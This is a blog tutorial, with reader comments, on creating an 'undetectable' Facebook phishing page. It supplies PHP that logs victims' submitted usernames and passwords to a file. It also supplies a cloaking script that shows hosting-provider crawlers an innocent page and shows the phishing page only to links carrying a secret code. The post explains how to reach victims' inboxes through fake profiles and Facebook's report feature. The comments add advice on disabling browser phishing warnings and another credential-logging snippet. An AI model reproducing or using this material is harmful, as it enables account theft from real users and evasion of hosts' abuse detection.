How to make undetectable facebook phising
THIS IS FOR EDUCATIONAL PURPOSE ONLY.PLEASE DONT USE IT FOR WRONG PURPOSES PLEASE ITS A HUMBLE REQUEST TO YOU.
Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk. What is phishing page? A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page. How to create? Visit the facebook page that you want to clone(clone means to make phising website). Save it (CTRL+S) via your browser. Choose save complete webpage while saving it via browser. Give name index while saving. (Dont use other name!)
Dont use other name! otherwise atlast facebook or other website will redirect the victim to reset the password saying that acoount hacked
Save it to a folder. Now, you should have one file named "index.htm" and a folder. We have to edit index.htm file. Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php? login_attempt=1" method="post" , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.
How to create login.php? Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php or you can download
Code:
<?php header("Location: http://www.google.com"); $handle = fopen("passes.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
You have to change http://www.google.com to the site url that you are cloning, in the upper code or in downloaded file for example, change it to http://www.facebook.com/ if you are cloning facebook. Now, you have your phishing page.
now we need to upload ALL this files to webhosting service refer to next article of mine or you can search in google for free web hosting service and upload these files in cpanels file manager
As web hosting service detects that its a phising website they will simply terminate the account so to save it do this thing
Host your phishing site without getting blocked
Here i will describe
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.
While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.
This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.
I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.
So how to bypass this??
Open any webpage you want to clone in your favorite browser.
Save the full page in .html.This step is almost common for every phishing attempt.
After saving the page you will get the page's source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to ".jpg"
For example if you have "Login.html". Just rename it to "Login.jpg".
Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to "fake.jpg"
Create a new file called “phishing.php” and write following content into it.
<?php
$id = $_GET["code"];
if ($id == "yourpasscode") {
$myFile = "main.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = "fake.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>
In this code you just have to do following modification..
1>Change "yourpasscode" to your desired one.
2>Change "main.jpg" to the file name which one contain the real phishing web page's code "Login.jpg"
3>Change "fake.jpg" to the file which file will contain the code of the fake page.
Now you have got the follwing files:
1)phishing.php (orginal phising page)
2)login.jpg
3)fake.jpg(fake page to be served if some one tried without the password earlier in this code it was "yourpasscode")
4)A folder[Contains all the client side scripts and images for the real phishing page]
Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php
with your browser.
Here you will get the fake page which is not actual login page.
Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.
If you want to change the GET parameter "code" just modify the second line of the php script.
Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.
now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account an your fake facebook profile
then click select report this acoount after that select this timeline is using a fake name then click continue
then select message to resolve this erase the previous message and type your message this message will go in inbox of victim account
have a great day
Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk. What is phishing page? A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page. How to create? Visit the facebook page that you want to clone(clone means to make phising website). Save it (CTRL+S) via your browser. Choose save complete webpage while saving it via browser. Give name index while saving. (Dont use other name!)
Dont use other name! otherwise atlast facebook or other website will redirect the victim to reset the password saying that acoount hacked
Save it to a folder. Now, you should have one file named "index.htm" and a folder. We have to edit index.htm file. Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php? login_attempt=1" method="post" , We have to edit this line only. Change https://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.
How to create login.php? Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php or you can download
Code:
<?php header("Location: http://www.google.com"); $handle = fopen("passes.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
You have to change http://www.google.com to the site url that you are cloning, in the upper code or in downloaded file for example, change it to http://www.facebook.com/ if you are cloning facebook. Now, you have your phishing page.
now we need to upload ALL this files to webhosting service refer to next article of mine or you can search in google for free web hosting service and upload these files in cpanels file manager
As web hosting service detects that its a phising website they will simply terminate the account so to save it do this thing
Host your phishing site without getting blocked
After i'v created the phishing page it's got suspended within 5-6 hours. So it was a big challenge for me to host my phishing sites. But it was big a challenge until I’v learned some basics of php.
Here i will describe
I will describe how can you fool your hosting provides and host your phishing content to their server without getting suspended by them.
While Web Hosting providers attempts to find all phishing attempts from their servers, sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files.
This concept is to serve a different innocent looking web page instead of your phishing page when your hosting provider try to access your uploaded content.
but when you send the link to your phishing site to victim you will send the link with a unique identification number(through URL i will come to this later).
Then only your innocent looking uploaded file turn into a phishing page.
I have tried this with 2-3 free hosting providers and every time i succeeded.
In normal scenario when you design your phishing page and upload files to your hosting account,
your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account.
So how to bypass this??
Open any webpage you want to clone in your favorite browser.
Save the full page in .html.This step is almost common for every phishing attempt.
After saving the page you will get the page's source code and also get a folder containing all the images and client side scripts.
I am assuming, you know how to configure the action field of the form/login page to configure a phishing page.
So after changing the action field what you have to do just rename the “html” page to ".jpg"
For example if you have "Login.html". Just rename it to "Login.jpg".
Now you have to choose any web page which will be served when your web hosting providers or anyone without having that unique identification number access the page.Do the same thing with that fake page also and rename it to "fake.jpg"
Create a new file called “phishing.php” and write following content into it.
<?php
$id = $_GET["code"];
if ($id == "yourpasscode") {
$myFile = "main.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}
else{
$myFile1 = "fake.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>
In this code you just have to do following modification..
1>Change "yourpasscode" to your desired one.
2>Change "main.jpg" to the file name which one contain the real phishing web page's code "Login.jpg"
3>Change "fake.jpg" to the file which file will contain the code of the fake page.
Now you have got the follwing files:
1)phishing.php (orginal phising page)
2)login.jpg
3)fake.jpg(fake page to be served if some one tried without the password earlier in this code it was "yourpasscode")
4)A folder[Contains all the client side scripts and images for the real phishing page]
Now just upload all this to your hosting account.And try to access the
http://yoursite.com/phishing.php
with your browser.
Here you will get the fake page which is not actual login page.
Now try to access
http://yoursite.com/phishing.php?code=yourpasscode
your phishing page will open.
If you want to change the GET parameter "code" just modify the second line of the php script.
Now what will happen,when your hosting privder will test your content they will get a innocent php file reading another file.and when they try will to access "login.jpg" file they will get an invalid/corrupted image.
now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account an your fake facebook profile
then click select report this acoount after that select this timeline is using a fake name then click continue
then select message to resolve this erase the previous message and type your message this message will go in inbox of victim account
have a great day
your tutorial is working and it makes page undetectable but i am still having problem in getting phished email and password. your tutorial is not very clear so kindly explain me in step wise sequence. please share that which you have learn , do mail me at kalra007offset@gmail.com with step wise sequence , thanks for sharing post.
ReplyDeletefirst of all thank you that you like my post as when you will open the link in chrome it will detect as phising site because il is clone of fb and it looks exact like fb and it is not possible to solve his problem what you can do just try that you disable the chrome malware or phising detection setting in chrome browser or you can use old version of chrome too or you simply try to use mobile version of facebook phishing the technique will be samr only you need to use h.facebook.com so do and reply whether it is working or not
Deletewhere you are having difficulty tell me i will surely help you.
ReplyDeleteCan you tell me Extention of login.html and fake.html remain same or not ..i just only rename them .after renaming it look like login.html.jpg and fake.html.jpg
ReplyDeleteI think you get my point.
I appreciate ur work.. but I m having problem in the fake.jpg part.. plz explain how to make that fake.jpg webpage n what are unique identification nums.. m waitimg for ur reply . Thanx
ReplyDeletefake.jpg is a fake website that will open when your web hosting provider will try to see what is their in your website they will get a fake page means not facebook phising page they will see any other website page that you need to make just take any web site for example mine is http://fblook.16mb.com/id.php and unique number is password that is needeed to open real facebook phis page mine is http://fblook.16mb.com/id.php?code=facebook here facebook is my password you can choose alphabet or number any thing very soon i will provide all the files in internet am having sem exam after that i will provide it okay
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeletei am not getting the phished password and email.. everything is pretty much fine..When i enter my site with code it open my phishing fb but when i click login it redirects me to my fake website...Can i redirect the person to original fb to fool them..?? ..Please explain how to obtain the email and password... Thank You.. :)
ReplyDeleteCan Someone Please answer.. ...Thank you
ReplyDeleteIt is working okay on my local host (XAMPP) but as soon i uploaded the files on free hosting website, my account of cpanel got suspended. Any help please!
ReplyDeleteHello iam sukhpreet
ReplyDeletePasses.txt is created but there is no username and password
First of all let me thank GOD for this new year 2016 and also let me thank the owner of this blog, for this wonderful post of his.
DeleteHi guys, my name is SWEE D. To get the email and password copy and paste this php script in notepad and save it as data.php
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
In the login.html above the one you rename to login.jpg. Before renaming it, first open it in notepad and press (Ctrl F) then search for the word "action" (NOTE: you will see many "action") here is what you will see (action="https://www.facebook.com/login.php?login_attempt=1&lwv=110") Now all you have to do is to change https://www.facebook.com/login.php?login_attempt=1&lwv=110 To data.php and save it as login.html, then after this is done rename it to login.jpg . That is all, in case you don't understand contact me on Skype (sweed.sweed7)
This comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThe blog did not show all the php script so just contact me on skype
ReplyDeleteplz help mee i have created phising page using two web hoster the phissing page is working but i cant get the password and the email hoe to get it?plzz
ReplyDelete